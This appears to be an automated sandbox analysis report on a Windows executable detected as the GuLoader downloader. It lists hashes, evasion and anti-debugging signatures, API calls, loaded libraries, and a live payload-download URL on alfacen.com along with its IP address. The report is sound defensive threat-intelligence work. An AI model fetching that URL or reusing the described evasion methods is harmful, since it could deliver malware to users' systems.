
Windows Analysis Report
3507071243740008011.exe

Overview

General Information

Sample name: 3507071243740008011.exe
Analysis ID: 1538168
MD5: 300ffb3fd65eb4a84a14802828f91e38
SHA1: 937574595a8e68f7a77b95a7f99b530007f9fc5c
SHA256: 24beefbe74ccf89b245d50c7279c83803186566d4be4f89f875e203ec2f4edf9
Tags: exe, user-Racco42

Detection

GuLoader
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Opens the same file many times (likely Sandbox evasion)
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
PE file contains executable resources (Code or Archives)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 3507071243740008011.exe (PID: 7284 cmdline: "C:\Users\user\Desktop\3507071243740008011.exe" MD5: 300FFB3FD65EB4A84A14802828F91E38)
    • 3507071243740008011.exe (PID: 8124 cmdline: "C:\Users\user\Desktop\3507071243740008011.exe" MD5: 300FFB3FD65EB4A84A14802828F91E38)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source: 00000000.00000002.2641992068.0000000005438000.00000040.00001000.00020000.00000000.sdmp
Rule: JoeSecurity_GuLoader_2
Description: Yara detected GuLoader
Author: Joe Security
Strings: none listed
    No Sigma rule has matched
    No Suricata rule has matched

    AV Detection

    Source: 3507071243740008011.exe | Avira: detected
    Source: 3507071243740008011.exe | ReversingLabs: Detection: 31%
    Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
    Source: 3507071243740008011.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: unknown | HTTPS traffic detected: 193.107.36.30:443 -> 192.168.2.4:49929 version: TLS 1.2
    Source: 3507071243740008011.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: mshtml.pdb | source: 3507071243740008011.exe, 00000005.00000001.2640954527.0000000000649000.00000020.00000001.01000000.00000006.sdmp
    Source: Binary string: wntdll.pdbUGP | source: 3507071243740008011.exe, 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.3040652875.00000000369C1000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: wntdll.pdb | source: 3507071243740008011.exe, 3507071243740008011.exe, 00000005.00000002.3396208437.0000000036EBE000.00000040.00001000.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000002.3396208437.0000000036D20000.00000040.00001000.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.3040652875.00000000369C1000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mshtml.pdbUGP | source: 3507071243740008011.exe, 00000005.00000001.2640954527.0000000000649000.00000020.00000001.01000000.00000006.sdmp
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 0_2_004065C5 FindFirstFileW,FindClose
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 0_2_00405990 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 0_2_00402862 FindFirstFileW
    Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global traffic | HTTP traffic detected: GET /jFhxxDhhDcCKVgiwlWM221.bin HTTP/1.1
        User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
        Host: alfacen.com
        Cache-Control: no-cache
    Source: global traffic | DNS traffic detected: DNS query: alfacen.com
    Source: 3507071243740008011.exe, 00000000.00000000.1711380790.000000000040A000.00000008.00000001.01000000.00000003.sdmp, 3507071243740008011.exe, 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp, 3507071243740008011.exe, 00000005.00000000.2638137136.000000000040A000.00000008.00000001.01000000.00000003.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: 3507071243740008011.exe, 00000005.00000001.2640954527.0000000000649000.00000020.00000001.01000000.00000006.sdmp | String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
    Source: 3507071243740008011.exe, 00000005.00000001.2640954527.00000000005F2000.00000020.00000001.01000000.00000006.sdmp | String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
    Source: 3507071243740008011.exe, 00000005.00000001.2640954527.00000000005F2000.00000020.00000001.01000000.00000006.sdmp | String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
    Source: 3507071243740008011.exe, 00000005.00000003.3040973789.0000000006CC3000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.3040929745.0000000006CBB000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.2880153523.0000000006CC7000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.3041155359.0000000006CC3000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.2880232804.0000000006CC7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://alfacen.com/
    Source: 3507071243740008011.exe, 00000005.00000003.3040973789.0000000006CC3000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.3040929745.0000000006CBB000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.2880153523.0000000006CC7000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.3041155359.0000000006CC3000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.2880232804.0000000006CC7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://alfacen.com/R
    Source: 3507071243740008011.exe, 00000005.00000002.3376402237.0000000006C58000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.3040973789.0000000006CC3000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000002.3395519172.0000000036160000.00000004.00001000.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.3040929745.0000000006CBB000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.2880153523.0000000006CC7000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.3041155359.0000000006CC3000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.2880232804.0000000006CC7000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000002.3376402237.0000000006CAD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://alfacen.com/jFhxxDhhDcCKVgiwlWM221.bin
    Source: 3507071243740008011.exe, 00000005.00000003.3040973789.0000000006CC3000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.3040929745.0000000006CBB000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.2880153523.0000000006CC7000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.3041155359.0000000006CC3000.00000004.00000020.00020000.00000000.sdmp, 3507071243740008011.exe, 00000005.00000003.2880232804.0000000006CC7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://alfacen.com/jFhxxDhhDcCKVgiwlWM221.binL
    Source: 3507071243740008011.exe, 00000005.00000001.2640954527.0000000000649000.00000020.00000001.01000000.00000006.sdmp | String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49982
    Source: unknown | Network traffic detected: HTTP traffic on port 49929 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49982 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49929
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 0_2_00405425 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D935C0 NtCreateMutant,LdrInitializeThunk
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D92DF0 NtQuerySystemInformation,LdrInitializeThunk
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D93090 NtSetValueKey
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D93010 NtOpenDirectoryObject
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D93D70 NtOpenThread
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D93D10 NtOpenProcessToken
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D939B0 NtGetContextThread
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D94650 NtSuspendThread
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D94340 NtSetContextThread
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D92EE0 NtQueueApcThread
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D92E80 NtReadVirtualMemory
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D92EA0 NtAdjustPrivilegesToken
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D92E30 NtWriteVirtualMemory
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D92FE0 NtCreateFile
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D92F90 NtProtectVirtualMemory
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D92FB0 NtResumeThread
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D92FA0 NtQuerySection
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D92F60 NtCreateProcessEx
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D92F30 NtCreateSection
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D92CC0 NtQueryVirtualMemory
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D92CF0 NtOpenProcess
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D92CA0 NtQueryInformationToken
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D92C70 NtFreeVirtualMemory
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D92C60 NtCreateKey
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D92C00 NtQueryInformationProcess
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D92DD0 NtDelayExecution
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D92DB0 NtEnumerateKey
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D92D10 NtMapViewOfSection
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D92D00 NtSetInformationFile
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D92D30 NtUnmapViewOfSection
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D92AD0 NtReadFile
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D92AF0 NtWriteFile
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D92AB0 NtWaitForSingleObject
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D92BF0 NtAllocateVirtualMemory
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D92BE0 NtQueryValueKey
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D92B80 NtQueryInformationFile
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D92BA0 NtEnumerateValueKey
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D92B60 NtClose
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 0_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 0_2_00404C62
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 0_2_00406ADD
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 0_2_004072B4
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E116CC
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DA5630
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E1F7B0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D51460
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E1F43F
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E295C3
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DFD5B0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E17571
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E012ED
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D7B2C0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D7D2F0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D652A0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DA739A
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D4D34C
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E1132D
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E1F0E0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E170E9
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D670C0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E0F0CC
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D6B1B0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E2B16B
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D4F172
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D9516C
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D69EB0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D23FD2
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D23FD5
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D61F92
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E1FFB1
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E1FF09
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E1FCF2
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DD9C32
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D7FDC0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E17D73
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D63D40
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E11D5A
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E0DAC6
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E01AA3
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DFDAAC
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DA5AA0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E17A46
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E1FA49
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DD3A6C
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D9DBF9
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DD5BF0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D7FB80
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E1FB76
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D638E0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DCD800
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D69950
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D7B950
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DF5910
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D7C6E0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D5C7C0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D84750
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D60770
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E0E4F6
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E12446
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E04420
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E20591
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D60535
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DE02C0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E00274
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E203E6
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D6E3F0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E1A352
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DF2000
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E181CC
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E141A2
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E201AA
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DE8158
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DFA118
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D50100
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E1EEDB
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D72E90
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E1CE93
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D60E59
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E1EE26
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D52FC8
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D6CFE0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DDEFA0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DD4F40
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E02F30
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D80F30
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DA2F28
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D50CF2
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E00CB5
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D60C00
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D5ADE0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D78DBF
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36DFCD1F
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D6AD00
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D5EA80
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E16BD7
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E1AB40
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D8E8F0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D468B8
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D62840
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D6A840
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36E2A9A6
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D629A0
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 5_2_36D76962
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: String function: 36DA7E54 appears 108 times
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: String function: 36DDF290 appears 105 times
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: String function: 36D4B970 appears 262 times
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: String function: 36DCEA12 appears 86 times
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: String function: 36D95130 appears 58 times
    Source: 3507071243740008011.exe | Static PE information: Resource name: RT_VERSION type: Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
    Source: 3507071243740008011.exe, 00000005.00000003.3040652875.0000000036AE4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs 3507071243740008011.exe
    Source: 3507071243740008011.exe, 00000005.00000002.3396208437.0000000036FF1000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs 3507071243740008011.exe
    Source: classification engine | Classification label: mal80.troj.evad.winEXE@2/8@1/1
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 0_2_004046E6 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Code function: 0_2_004020FE CoCreateInstance
    Source: C:\Users\user\Desktop\3507071243740008011.exe | File created: C:\Users\user\AppData\Roaming\pechay
    Source: C:\Users\user\Desktop\3507071243740008011.exe | File created: C:\Users\user\AppData\Local\Temp\nso624C.tmp
    Source: 3507071243740008011.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\3507071243740008011.exe | File read: C:\Users\desktop.ini
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Users\user\Desktop\3507071243740008011.exe | File read: C:\Users\user\Desktop\3507071243740008011.exe
    Source: unknown | Process created: C:\Users\user\Desktop\3507071243740008011.exe "C:\Users\user\Desktop\3507071243740008011.exe"
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Process created: C:\Users\user\Desktop\3507071243740008011.exe "C:\Users\user\Desktop\3507071243740008011.exe"
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: uxtheme.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: userenv.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: apphelp.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: propsys.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: dwmapi.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: cryptbase.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: oleacc.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: version.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: shfolder.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: kernel.appcore.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: windows.storage.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: wldp.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: riched20.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: usp10.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: msls31.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: textinputframework.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: coreuicomponents.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: coremessaging.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: ntmarta.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: wintypes.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: wintypes.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: wintypes.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: profapi.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: iertutil.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: sspicli.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: powrprof.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: winhttp.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: wkscli.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: netutils.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: umpdc.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: wininet.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: windows.storage.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: wldp.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: profapi.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: kernel.appcore.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: ondemandconnroutehelper.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: mswsock.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: iphlpapi.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: winnsi.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: urlmon.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: srvcli.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: dnsapi.dll
    Source: C:\Users\user\Desktop\3507071243740008011.exe | Section loaded: rasadhlp.dll
